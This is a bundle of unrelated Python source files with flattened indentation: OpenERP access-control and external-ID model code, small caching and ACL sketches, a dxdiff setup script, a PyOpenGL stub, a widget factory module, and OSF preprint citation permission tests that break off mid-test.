access = bool(r and r[0])
if access:
return True
# pass no groups -> no access
return False
def group_names_with_access(self, cr, model_name, access_mode):
"""Returns the names of visible groups which have been granted ``access_mode`` on
the model ``model_name``.
:rtype: list
"""
assert access_mode in ['read','write','create','unlink'], 'Invalid access mode: %s' % access_mode
cr.execute('''SELECT
c.name, g.name
FROM
ir_model_access a
JOIN ir_model m ON (a.model_id=m.id)
JOIN res_groups g ON (a.group_id=g.id)
LEFT JOIN ir_module_category c ON (c.id=g.category_id)
WHERE
m.model=%s AND
a.active IS True AND
a.perm_''' + access_mode, (model_name,))
return [('%s/%s' % x) if x[0] else x[1] for x in cr.fetchall()]
    # The context parameter is useful when the method translates error messages.
    # But as the method raises an exception in that case, the key 'lang' might
    # not really be necessary as a cache key, unless the `ormcache_context`
    # decorator catches the exception (it does not at the moment).
@tools.ormcache_context(accepted_keys=('lang',))
def check(self, cr, uid, model, mode='read', raise_exception=True, context=None):
        if uid == 1:
            # the root user has all access rights
# TODO: exclude xml-rpc requests
return True
assert mode in ['read','write','create','unlink'], 'Invalid access mode'
if isinstance(model, BaseModel):
assert model._name == 'ir.model', 'Invalid model object'
model_name = model.model
else:
model_name = model
# TransientModel records have no access rights, only an implicit access rule
if model_name not in self.pool:
            _logger.error('Missing model %s', model_name)
elif self.pool[model_name].is_transient():
return True
# We check if a specific rule exists
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' JOIN res_groups_users_rel gu ON (gu.gid = a.group_id) '
' WHERE m.model = %s '
' AND gu.uid = %s '
' AND a.active IS True '
, (model_name, uid,)
)
r = cr.fetchone()[0]
if r is None:
# there is no specific rule. We check the generic rule
cr.execute('SELECT MAX(CASE WHEN perm_' + mode + ' THEN 1 ELSE 0 END) '
' FROM ir_model_access a '
' JOIN ir_model m ON (m.id = a.model_id) '
' WHERE a.group_id IS NULL '
' AND m.model = %s '
' AND a.active IS True '
, (model_name,)
)
r = cr.fetchone()[0]
if not r and raise_exception:
groups = '\n\t'.join('- %s' % g for g in self.group_names_with_access(cr, model_name, mode))
msg_heads = {
# Messages are declared in extenso so they are properly exported in translation terms
'read': _("Sorry, you are not allowed to access this document."),
'write': _("Sorry, you are not allowed to modify this document."),
'create': _("Sorry, you are not allowed to create this kind of document."),
'unlink': _("Sorry, you are not allowed to delete this document."),
}
if groups:
msg_tail = _("Only users with the following access level are currently allowed to do that") + ":\n%s\n\n(" + _("Document model") + ": %s)"
msg_params = (groups, model_name)
else:
msg_tail = _("Please contact your system administrator if you think this is an error.") + "\n\n(" + _("Document model") + ": %s)"
msg_params = (model_name,)
_logger.warning('Access Denied by ACLs for operation: %s, uid: %s, model: %s', mode, uid, model_name)
msg = '%s %s' % (msg_heads[mode], msg_tail)
raise openerp.exceptions.AccessError(msg % msg_params)
return bool(r)
__cache_clearing_methods = []
def register_cache_clearing_method(self, model, method):
self.__cache_clearing_methods.append((model, method))
def unregister_cache_clearing_method(self, model, method):
try:
i = self.__cache_clearing_methods.index((model, method))
del self.__cache_clearing_methods[i]
except ValueError:
pass
def call_cache_clearing_methods(self, cr):
self.invalidate_cache(cr, SUPERUSER_ID)
self.check.clear_cache(self) # clear the cache of check function
for model, method in self.__cache_clearing_methods:
if model in self.pool:
getattr(self.pool[model], method)()
#
# Check rights on actions
#
def write(self, cr, uid, ids, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).write(cr, uid, ids, values, context=context)
return res
def create(self, cr, uid, values, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).create(cr, uid, values, context=context)
return res
def unlink(self, cr, uid, ids, context=None):
self.call_cache_clearing_methods(cr)
res = super(ir_model_access, self).unlink(cr, uid, ids, context=context)
return res
class ir_model_data(osv.osv):
"""Holds external identifier keys for records in the database.
This has two main uses:
* allows easy data integration with third-party systems,
making import/export/sync of data possible, as records
can be uniquely identified across multiple systems
* allows tracking the origin of data installed by OpenERP
modules themselves, thus making it possible to later
update them seamlessly.
"""
_name = 'ir.model.data'
_order = 'module,model,name'
def name_get(self, cr, uid, ids, context=None):
bymodel = defaultdict(dict)
names = {}
for res in self.browse(cr, uid, ids, context=context):
bymodel[res.model][res.res_id] = res
names[res.id] = res.complete_name
for model, id_map in bymodel.iteritems():
try:
ng = dict(self.pool[model].name_get(cr, uid, id_map.keys(), context=context))
except Exception:
pass
else:
for r in id_map.itervalues():
names[r.id] = ng.get(r.res_id, r.complete_name)
return [(i, names[i]) for i in ids]
def _complete_name_get(self, cr, uid, ids, prop, unknow_none, context=None):
result = {}
for res in self.browse(cr, uid, ids, context=context):
result[res.id] = (res.module and (res.module + '.') or '')+res.name
return result
_columns = {
'name': fields.char('External Identifier', required=True, select=1,
help="External Key/Identifier that can be used for "
"data integration with third-party systems"),
'complete_name': fields.function(_complete_name_get, type='char', string='Complete ID'),
'model': fields.char('Model Name', required=True, select=1),
'module': fields.char('Module', required=True, select=1),
'res_id': fields.integer('Record ID', select=1,
help="ID of the target record in the database"),
'noupdate': fields.boolean('Non Updatable'),
'date_update': fields.datetime('Update Date'),
'date_init': fields.datetime('Init Date')
}
_defaults = {
'date_init': fields.datetime.now,
'date_update': fields.datetime.now,
'noupdate': False,
'module': ''
}
_sql_constraints = [
('module_name_uniq', 'unique(name, module)', 'You cannot have multiple records with the same external ID in the same module!'),
]
def __init__(self, pool, cr):
osv.osv.__init__(self, pool, cr)
# also stored in pool to avoid being discarded along with this osv instance
if getattr(pool, 'model_data_reference_ids', None) is None:
self.pool.model_data_reference_ids = {}
# put loads on the class, in order to share it among all instances
type(self).loads = self.pool.model_data_reference_ids
def _auto_init(self, cr, context=None):
res = super(ir_model_data, self)._auto_init(cr, context)
cr.execute('SELECT indexname FROM pg_indexes WHERE indexname = \'ir_model_data_module_name_index\'')
if not cr.fetchone():
cr.execute('CREATE INDEX ir_model_data_module_name_index ON ir_model_data (module, name)')
return res
# NEW V8 API
@tools.ormcache(skiparg=3)
def xmlid_lookup(self, cr, uid, xmlid):
"""Low level xmlid lookup
Return (id, res_model, res_id) or raise ValueError if not found
"""
module, name = xmlid.split('.', 1)
ids = self.search(cr, uid, [('module','=',module), ('name','=', name)])
if not ids:
raise ValueError('External ID not found in the system: %s' % (xmlid))
        # the SQL unique constraint guarantees a single result
res = self.read(cr, uid, ids[0], ['model', 'res_id'])
if not res['res_id']:
raise ValueError('External ID not found in the system: %s' % (xmlid))
return ids[0], res['model'], res['res_id']
def xmlid_to_res_model_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Return (res_model, res_id)"""
try:
return self.xmlid_lookup(cr, uid, xmlid)[1:3]
except ValueError:
if raise_if_not_found:
raise
return (False, False)
def xmlid_to_res_id(self, cr, uid, xmlid, raise_if_not_found=False):
""" Returns res_id """
return self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)[1]
def xmlid_to_object(self, cr, uid, xmlid, raise_if_not_found=False, context=None):
""" Return a browse_record
if not found and raise_if_not_found is True return None
"""
t = self.xmlid_to_res_model_res_id(cr, uid, xmlid, raise_if_not_found)
res_model, res_id = t
if res_model and res_id:
record = self.pool[res_model].browse(cr, uid, res_id, context=context)
if record.exists():
return record
if raise_if_not_found:
raise ValueError('No record found for unique ID %s. It may have been deleted.' % (xmlid))
return None
# OLD API
def _get_id(self, cr, uid, module, xml_id):
"""Returns the id of the ir.model.data record corresponding to a given module and xml_id (cached) or raise a ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[0]
def get_object_reference(self, cr, uid, module, xml_id):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached) or raise ValueError if not found"""
return self.xmlid_lookup(cr, uid, "%s.%s" % (module, xml_id))[1:3]
def check_object_reference(self, cr, uid, module, xml_id, raise_on_access_error=False):
"""Returns (model, res_id) corresponding to a given module and xml_id (cached), if and only if the user has the necessary access rights
to see that object, otherwise raise a ValueError if raise_on_access_error is True or returns a tuple (model found, False)"""
model, res_id = self.get_object_reference(cr, uid, module, xml_id)
#search on id found in result to check if current user has read access right
check_right = self.pool.get(model).search(cr, uid, [('id', '=', res_id)])
if check_right:
return model, res_id
if raise_on_access_error:
raise ValueError('Not enough access rights on the external ID: %s.%s' % (module, xml_id))
return model, False
def get_object(self, cr, uid, module, xml_id, context=None):
""" Returns a browsable record for the given module name and xml_id.
If not found, raise a ValueError or return None, depending
on the value of `raise_exception`.
"""
return self.xmlid_to_object(cr, uid, "%s.%s" % (module, xml_id), raise_if_not_found=True, context=context)
    def _update_dummy(self, cr, uid, model, module, xml_id=False, store=True):
if not xml_id:
return False
id = False
try:
# One step to check the ID is defined and the record actually exists
record = self.get_object(cr, uid, module, xml_id)
if record:
id = record.id
self.loads[(module,xml_id)] = (model,id)
for table, inherit_field in self.pool[model]._inherits.iteritems():
parent_id = record[inherit_field].id
parent_xid = '%s_%s' % (xml_id, table.replace('.', '_'))
self.loads[(module, parent_xid)] = (table, parent_id)
except Exception:
pass
return id
def clear_caches(self):
""" Clears all orm caches on the object's methods
:returns: itself
"""
self.xmlid_lookup.clear_cache(self)
return self
def unlink(self, cr, uid, ids, context=None):
""" Regular unlink method, but make sure to clear the caches. """
self.clear_caches()
return super(ir_model_data,self).unlink(cr, uid, ids, context=context)
    def _update(self, cr, uid, model, module, values, xml_id=False, store=True, noupdate=False, mode='init', res_id=False, context=None):
model_obj = self.pool[model]
if not context:
context = {}
# records created during module install should not display the messages of OpenChatter
context = dict(context, install_mode=True)
if xml_id and ('.' in xml_id):
            assert len(xml_id.split('.')) == 2, _("'%s' contains too many dots. XML ids should not contain dots! Dots are used to refer to data of other modules, as in module.reference_id") % xml_id
module, xml_id = xml_id.split('.')
action_id = False
if xml_id:
cr.execute('''SELECT imd.id, imd.res_id, md.id, imd.model, imd.noupdate
FROM ir_model_data imd LEFT JOIN %s md ON (imd.res_id = md.id)
WHERE imd.module=%%s AND imd.name=%%s''' % model_obj._table,
(module, xml_id))
results = cr.fetchall()
for imd_id2,res_id2,real_id2,real_model,noupdate_imd in results:
                # In update mode, do not update a record if its ir.model.data is flagged as noupdate
if mode == 'update' and noupdate_imd:
return res_id2
if not real_id2:
self.clear_caches()
cr.execute('delete from ir_model_data where id=%s', (imd_id2,))
res_id = False
else:
assert model == real_model, "External ID conflict, %s already refers to a `%s` record,"\
" you can't define a `%s` record with this ID." % (xml_id, real_model, model)
res_id,action_id = res_id2,imd_id2
if action_id and res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
self.write(cr, SUPERUSER_ID, [action_id], {
'date_update': time.strftime('%Y-%m-%d %H:%M:%S'),
},context=context)
elif res_id:
model_obj.write(cr, uid, [res_id], values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, SUPERUSER_ID, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, SUPERUSER_ID, {
'name': xml_id,
'model': model,
'module':module,
'res_id':res_id,
'noupdate': noupdate,
},context=context)
else:
if mode=='init' or (mode=='update' and xml_id):
inherit_xml_ids = []
if xml_id:
for table, field_name in model_obj._inherits.items():
xml_ids = self.pool['ir.model.data'].search(cr, uid, [
('module', '=', module),
('name', '=', xml_id + '_' + table.replace('.', '_')),
], context=context)
# XML ID found in the database, try to recover an existing record
if xml_ids:
found_xml_id = self.pool['ir.model.data'].browse(cr, uid, xml_ids[0], context=context)
record = self.pool[found_xml_id.model].browse(cr, uid, [found_xml_id.res_id], context=context)[0]
# The record exists, store the id and don't recreate the XML ID
if record.exists():
inherit_xml_ids.append(found_xml_id.model)
values[field_name] = found_xml_id.res_id
# Orphan XML ID, delete it
else:
found_xml_id.unlink()
res_id = model_obj.create(cr, uid, values, context=context)
if xml_id:
if model_obj._inherits:
for table in model_obj._inherits:
if table in inherit_xml_ids:
continue
inherit_id = model_obj.browse(cr, uid,
res_id,context=context)[model_obj._inherits[table]]
self.create(cr, SUPERUSER_ID, {
'name': xml_id + '_' + table.replace('.', '_'),
'model': table,
'module': module,
'res_id': inherit_id.id,
'noupdate': noupdate,
},context=context)
self.create(cr, SUPERUSER_ID, {
'name': xml_id,
'model': model,
'module': module,
'res_id': res_id,
'noupdate': noupdate
},context=context)
if xml_id and res_id:
self.loads[(module, xml_id)] = (model, res_id)
for table, inherit_field in model_obj._inherits.iteritems():
inherit_id = model_obj.read(cr, uid, [res_id],
[inherit_field])[0][inherit_field]
self.loads[(module, xml_id + '_' + table.replace('.', '_'))] = (table, inherit_id)
return res_id
def ir_set(self, cr, uid, key, key2, name, models, value, replace=True, isobject=False, meta=None, xml_id=False):
ir_values_obj = openerp.registry(cr.dbname)['ir.values']
ir_values_obj.set(cr, uid, key, key2, name, models, value, replace, isobject, meta)
return True
def _module_data_uninstall(self, cr, uid, modules_to_remove, context=None):
"""Deletes all the records referenced by the ir.model.data entries
``ids`` along with their corresponding database backed (including
dropping tables, columns, FKs, etc, as long as there is no other
ir.model.data entry holding a reference to them (which indicates that
they are still owned by another module).
Attempts to perform the deletion in an appropriate order to maximize
the chance of gracefully deleting all records.
This step is performed as part of the full uninstallation of a module.
"""
ids = self.search(cr, uid, [('module', 'in', modules_to_remove)])
if uid != 1 and not self.pool['ir.model.access'].check_groups(cr, uid, "base.group_system"):
            raise except_orm(_('Permission Denied'), _('Administrator access is required to uninstall a module'))
context = dict(context or {})
context[MODULE_UNINSTALL_FLAG] = True # enable model/field deletion
ids_set = set(ids)
wkf_todo = []
to_unlink = []
        ids.sort(reverse=True)
for data in self.browse(cr, uid, ids, context):
model = data.model
res_id = data.res_id
pair_to_unlink = (model, res_id)
if pair_to_unlink not in to_unlink:
to_unlink.append(pair_to_unlink)
if model == 'workflow.activity':
# Special treatment for workflow activities: temporarily revert their
# incoming transition and trigger an update to force all workflow items
# to move out before deleting them
cr.execute('select res_type,res_id from wkf_instance where id IN (select inst_id from wkf_workitem where act_id=%s)', (res_id,))
wkf_todo.extend(cr.fetchall())
cr.execute("update wkf_transition set condition='True', group_id=NULL, signal=NULL,act_to=act_from,act_from=%s where act_to=%s", (res_id,res_id))
self.invalidate_cache(cr, uid, context=context)
for model,res_id in wkf_todo:
try:
openerp.workflow.trg_write(uid, model, res_id, cr)
except Exception:
_logger.info('Unable to force processing of workflow for item %s@%s in order to leave activity to be deleted', res_id, model, exc_info=True)
def unlink_if_refcount(to_unlink):
for model, res_id in to_unlink:
external_ids = self.search(cr, uid, [('model', '=', model),('res_id', '=', res_id)])
if set(external_ids)-ids_set:
# if other modules have defined this record, we must not delete it
continue
if model == 'ir.model.fields':
# Don't remove the LOG_ACCESS_COLUMNS unless _log_access
# has been turned off on the model.
field = self.pool[model].browse(cr, uid, [res_id], context=context)[0]
if not field.exists():
_logger.info('Deleting orphan external_ids %s', external_ids)
self.unlink(cr, uid, external_ids)
continue
if field.name in openerp.models.LOG_ACCESS_COLUMNS and self.pool[field.model]._log_access:
continue
if field.name == 'id':
continue
_logger.info('Deleting %s@%s', res_id, model)
try:
cr.execute('SAVEPOINT record_unlink_save')
self.pool[model].unlink(cr, uid, [res_id], context=context)
except Exception:
_logger.info('Unable to delete %s@%s', res_id, model, exc_info=True)
cr.execute('ROLLBACK TO SAVEPOINT record_unlink_save')
else:
cr.execute('RELEASE SAVEPOINT record_unlink_save')
# Remove non-model records first, then model fields, and finish with models
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model not in ('ir.model','ir.model.fields','ir.model.constraint'))
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.constraint')
ir_module_module = self.pool['ir.module.module']
ir_model_constraint = self.pool['ir.model.constraint']
modules_to_remove_ids = ir_module_module.search(cr, uid, [('name', 'in', modules_to_remove)], context=context)
constraint_ids = ir_model_constraint.search(cr, uid, [('module', 'in', modules_to_remove_ids)], context=context)
ir_model_constraint._module_data_uninstall(cr, uid, constraint_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model.fields')
ir_model_relation = self.pool['ir.model.relation']
relation_ids = ir_model_relation.search(cr, uid, [('module', 'in', modules_to_remove_ids)])
ir_model_relation._module_data_uninstall(cr, uid, relation_ids, context)
unlink_if_refcount((model, res_id) for model, res_id in to_unlink
if model == 'ir.model')
cr.commit()
self.unlink(cr, uid, ids, context)
def _process_end(self, cr, uid, modules):
""" Clear records removed from updated module data.
This method is called at the end of the module loading process.
It is meant to removed records that are no longer present in the
updated data. Such records are recognised as the one with an xml id
and a module in ir_model_data and noupdate set to false, but not
present in self.loads.
"""
if not modules or config.get('import_partial'):
return True
bad_imd_ids = []
context = {MODULE_UNINSTALL_FLAG: True}
cr.execute("""SELECT id,name,model,res_id,module FROM ir_model_data
WHERE module IN %s AND res_id IS NOT NULL AND noupdate=%s ORDER BY id DESC
""", (tuple(modules), False))
for (id, name, model, res_id, module) in cr.fetchall():
if (module, name) not in self.loads:
if model in self.pool:
_logger.info('Deleting %s@%s (%s.%s)', res_id, model, module, name)
if self.pool[model].exists(cr, uid, [res_id], context=context):
self.pool[model].unlink(cr, uid, [res_id], context=context)
else:
bad_imd_ids.append(id)
if bad_imd_ids:
self.unlink(cr, uid, bad_imd_ids, context=context)
self.loads.clear()
class wizard_model_menu(osv.osv_memory):
_name = 'wizard.ir.model.menu.create'
_columns = {
'menu_id': fields.many2one('ir.ui.menu', 'Parent Menu', required=True),
'name': fields.char('Menu Name', required=True),
}
def menu_create(self, cr, uid, ids, context=None):
if not context:
context = {}
model_pool = self.pool.get('ir.model')
for menu in self.browse(cr, uid, ids, context):
model = model_pool.browse(cr, uid, context.get('model_id'), context=context)
val = {
'name': menu.name,
'res_model': model.model,
'view_type': 'form',
'view_mode': 'tree,form'
}
action_id = self.pool.get('ir.actions.act_window').create(cr, uid, val)
self.pool.get('ir.ui.menu').create(cr, uid, {
'name': menu.name,
'parent_id': menu.menu_id.id,
'action': 'ir.actions.act_window,%d' % (action_id,),
'icon': 'STOCK_INDENT'
}, context)
return {'type':'ir.actions.act_window_close'}
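# A minimal, self-contained sketch (not OpenERP's actual implementation) of the
# context-keyed caching idea behind the @tools.ormcache_context decorator used
# on ir.model.access.check above: only whitelisted context keys (e.g. 'lang')
# take part in the cache key, so calls that differ only in irrelevant context
# entries share a cache slot.
def _ormcache_context_sketch(accepted_keys=()):
    def decorator(func):
        cache = {}
        def wrapper(self, *args, **kwargs):
            context = kwargs.get('context') or {}
            # keep only the whitelisted context entries in the key
            ctx_key = tuple(sorted((k, context[k]) for k in accepted_keys if k in context))
            key = (args, ctx_key)
            if key not in cache:
                cache[key] = func(self, *args, **kwargs)
            return cache[key]
        return wrapper
    return decorator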
|
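# A simplified, self-contained sketch of the two-step ACL lookup performed by
# ir.model.access.check above: group-specific rules for the requested mode are
# consulted first, and the global (group-less) rules are used only when no
# group-specific rule exists for the user. The data layout here is
# hypothetical; OpenERP stores these rules in SQL tables.
def check_access(user_groups, acls, model, mode):
    """acls: list of dicts with keys 'model', 'mode', 'group' (None = global), 'perm'."""
    specific = [a for a in acls if a['model'] == model and a['mode'] == mode
                and a['group'] in user_groups]
    if specific:
        # a group-specific rule exists for this user: it alone decides
        return any(a['perm'] for a in specific)
    # no specific rule: fall back to the generic (group-less) rules
    return any(a['perm'] for a in acls
               if a['model'] == model and a['mode'] == mode and a['group'] is None)

if __name__ == '__main__':
    acls = [
        {'model': 'res.partner', 'mode': 'write', 'group': 'base.group_user', 'perm': True},
        {'model': 'res.partner', 'mode': 'write', 'group': None, 'perm': False},
    ]
    assert check_access(['base.group_user'], acls, 'res.partner', 'write')
    assert not check_access([], acls, 'res.partner', 'write')
|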
from distutils.core import setup
import os
import os.path
import glob
try:
destdir = os.environ["DESTDIR"]
except KeyError:
destdir = ""
setup(
name='dxdiff',
version='1.0',
description="An XML aware diff tool.",
author = "The ICOM team",
author_email = "fraser.waters08@imperial.ac.uk",
url = "http://amcg.ese.ic.ac.uk",
packages = ['dxdiff'],
scripts=["dxdiff/dxdiff"],
)
|
'''Autogenerated by xml_generate script, do not edit!'''
from OpenGL import platform as _p, arrays
from OpenGL.raw.GL import _types as _cs
from OpenGL.raw.GL._types import *
from OpenGL.raw.GL import _errors
from OpenGL.constant import Constant as _C
import ctypes
_EXTENSION_NAME = 'GL_ARB_texture_env_crossbar'
def _f( function ):
return _p.createFunction( function,_p.PLATFORM.GL,'GL_ARB_texture_env_crossbar',error_checker=_errors._error_checker)
|
from lib import cache
from lib import exception
from lib import base
from lib import constants
from lib.page.widget import info_widget
from lib.page.widget import admin_widget
from lib.page.widget import generic_widget
def _filter_out_underscore(object_name):
    """Class names don't contain underscores, so we strip them from the
    object name before the lookup."""
    # str.replace is a no-op when no underscore is present
    return object_name.replace("_", "")
def _all_subclasses(cls):
"""Returns all subclassses for a parent"""
return cls.__subclasses__() + \
[g for s in cls.__subclasses__() for g in _all_subclasses(s)]
def _factory(cls_name, parent_cls, search_nested_subclasses=False):
"""Returns a subclass from parent
Args:
cls_name (basestring)
parent_cls (cls)
search_nested_subclasses (bool)
Returns:
cls
"""
subcls_name = _filter_out_underscore(cls_name.lower())
members = _all_subclasses(parent_cls) \
if search_nested_subclasses \
else parent_cls.__subclasses__()
for member_cls in members:
if member_cls.__name__.lower() == subcls_name:
break
else:
raise exception.NoClassFound(
"%s for parent %s" % (subcls_name, parent_cls))
return member_cls
def get_method_lhn_select(object_name):
"""Returns the method of LHN class
Args:
object_name (basestring)
"""
return constants.method.SELECT_PREFIX \
+ cache.LHN_SECTION_MEMBERS[object_name]
def get_method_select(object_name):
"""Returns the method of LHN class
Args:
object_name (basestring)
"""
return constants.method.SELECT_PREFIX + object_name
def get_cls_test_utils(object_name):
"""Returns a test utils class based on object name
Args:
object_name (basestring)
"""
cls_name = constants.cls_name.TEST_MODAL_NEW_PREFIX + object_name
return _factory(cls_name, base.TestUtil, search_nested_subclasses=True)
def get_cls_widget(object_name, is_info=False, is_admin=False):
"""Returns the info widget class
Args:
object_name (basestring)
"""
if is_info:
base_cls = info_widget.Widget
elif is_admin:
base_cls = admin_widget.Widget
else:
base_cls = generic_widget.Widget
return _factory(object_name, base_cls)
def get_locator_widget(widget_name):
"""Returns the locator for the widget tab in the widget bar"""
# todo: unittests
return getattr(constants.locator.WidgetBar, widget_name.upper())
def get_locator_add_widget(widget_name):
"""Returns the locator for the selected widget from the add widget button
dropdown in the widget bar"""
# todo: unittests
return getattr(
constants.locator.WidgetBarButtonAddDropdown, widget_name.upper())
|
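# A self-contained sketch of the subclass-factory pattern implemented by
# _factory/_all_subclasses above: walk a base class's subclass tree recursively
# and pick the subclass whose lowercased, underscore-free name matches the
# requested one. The classes here are hypothetical stand-ins for the real
# widget classes.
class Widget(object):
    pass

class InfoWidget(Widget):
    pass

class AdminInfoWidget(InfoWidget):
    pass

def all_subclasses(cls):
    # direct subclasses plus, recursively, their subclasses
    return cls.__subclasses__() + [
        g for s in cls.__subclasses__() for g in all_subclasses(s)]

def factory(cls_name, parent_cls):
    wanted = cls_name.lower().replace("_", "")
    for member in all_subclasses(parent_cls):
        if member.__name__.lower() == wanted:
            return member
    raise LookupError("%s for parent %s" % (wanted, parent_cls))

assert factory("admin_info_widget", Widget) is AdminInfoWidget
|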
from api.base.settings.defaults import API_BASE
from api.citations.utils import render_citation
from django.utils import timezone
from nose.tools import * # noqa:
from osf_tests.factories import AuthUserFactory, PreprintFactory
from tests.base import ApiTestCase
from osf.utils.permissions import WRITE
from osf.utils.workflows import DefaultStates
class PreprintCitationsMixin(object):
def setUp(self):
super(PreprintCitationsMixin, self).setUp()
self.admin_contributor = AuthUserFactory()
self.published_preprint = PreprintFactory(
creator=self.admin_contributor)
self.unpublished_preprint = PreprintFactory(
creator=self.admin_contributor, is_published=False)
def test_unauthenticated_can_view_published_preprint_citations(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
def test_unauthenticated_cannot_view_unpublished_preprint_citations(self):
res = self.app.get(self.unpublished_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
def test_preprint_citations_are_read_only(self):
post_res = self.app.post_json_api(
self.published_preprint_url, {},
auth=self.admin_contributor.auth,
expect_errors=True)
assert_equal(post_res.status_code, 405)
put_res = self.app.put_json_api(
self.published_preprint_url, {},
auth=self.admin_contributor.auth,
expect_errors=True)
assert_equal(put_res.status_code, 405)
delete_res = self.app.delete_json_api(
self.published_preprint_url,
auth=self.admin_contributor.auth,
expect_errors=True)
assert_equal(delete_res.status_code, 405)
class TestPreprintCitations(PreprintCitationsMixin, ApiTestCase):
def setUp(self):
super(TestPreprintCitations, self).setUp()
self.published_preprint_url = '/{}preprints/{}/citation/'.format(
API_BASE, self.published_preprint._id)
self.unpublished_preprint_url = '/{}preprints/{}/citation/'.format(
API_BASE, self.unpublished_preprint._id)
self.other_contrib = AuthUserFactory()
def test_citation_publisher_is_preprint_provider(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
assert_equal(
res.json['data']['attributes']['publisher'],
self.published_preprint.provider.name)
def test_citation_url_is_preprint_url_not_project(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
assert_equal(
res.json['data']['links']['self'],
self.published_preprint.display_absolute_url
)
class TestPreprintCitationsPermissions(PreprintCitationsMixin, ApiTestCase):
def setUp(self):
super(TestPreprintCitationsPermissions, self).setUp()
self.published_preprint_url = '/{}preprints/{}/citation/'.format(
API_BASE, self.published_preprint._id)
self.unpublished_preprint_url = '/{}preprints/{}/citation/'.format(
API_BASE, self.unpublished_preprint._id)
self.other_contrib = AuthUserFactory()
def test_unpublished_preprint_citations(self):
# Unauthenticated
res = self.app.get(self.unpublished_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.unpublished_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.unpublished_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.unpublished_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state, not because of published flag
assert_equal(res.status_code, 403)
# Admin contrib
res = self.app.get(self.unpublished_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
def test_private_preprint_citations(self):
self.published_preprint.is_public = False
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
        # Contributors can view citations of a private preprint
assert_equal(res.status_code, 200)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
def test_deleted_preprint_citations(self):
self.published_preprint.deleted = timezone.now()
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 404)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 404)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
        # 404 because the preprint is deleted
assert_equal(res.status_code, 404)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth, expect_errors=True)
assert_equal(res.status_code, 404)
def test_abandoned_preprint_citations(self):
self.published_preprint.machine_state = DefaultStates.INITIAL.value
self.published_preprint.save()
# Unauthenticated
res = self.app.get(self.published_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
assert_equal(res.status_code, 403)
# Write contrib
self.published_preprint.add_contributor(self.other_contrib, WRITE, save=True)
res = self.app.get(self.published_preprint_url, auth=self.other_contrib.auth, expect_errors=True)
# Really because preprint is in initial machine state
assert_equal(res.status_code, 403)
# Admin contrib
res = self.app.get(self.published_preprint_url, auth=self.admin_contributor.auth)
assert_equal(res.status_code, 200)
class TestPreprintCitationContent(PreprintCitationsMixin, ApiTestCase):
def setUp(self):
super(TestPreprintCitationContent, self).setUp()
self.published_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.published_preprint._id)
self.unpublished_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.unpublished_preprint._id)
def test_citation_contains_correct_date(self):
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
expected_date = self.published_preprint.date_published.strftime('%Y, %B %-d')
assert_true(
expected_date in res.json['data']['attributes']['citation'])
def test_citation_no_date(self):
self.published_preprint.date_published = None
self.published_preprint.save()
res = self.app.get(self.published_preprint_url)
assert_equal(res.status_code, 200)
expected_date = 'n.d.'
assert_true(
expected_date in res.json['data']['attributes']['citation'])
class TestPreprintCitationsContentPermissions(PreprintCitationsMixin, ApiTestCase):
def setUp(self):
super(TestPreprintCitationsContentPermissions, self).setUp()
self.published_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.published_preprint._id)
self.unpublished_preprint_url = '/{}preprints/{}/citation/apa/'.format(
API_BASE, self.unpublished_preprint._id)
self.other_contrib = AuthUserFactory()
def test_unpublished_preprint_citations(self):
# Unauthenticated
res = self.app.get(self.unpublished_preprint_url, expect_errors=True)
assert_equal(res.status_code, 401)
# Non contrib
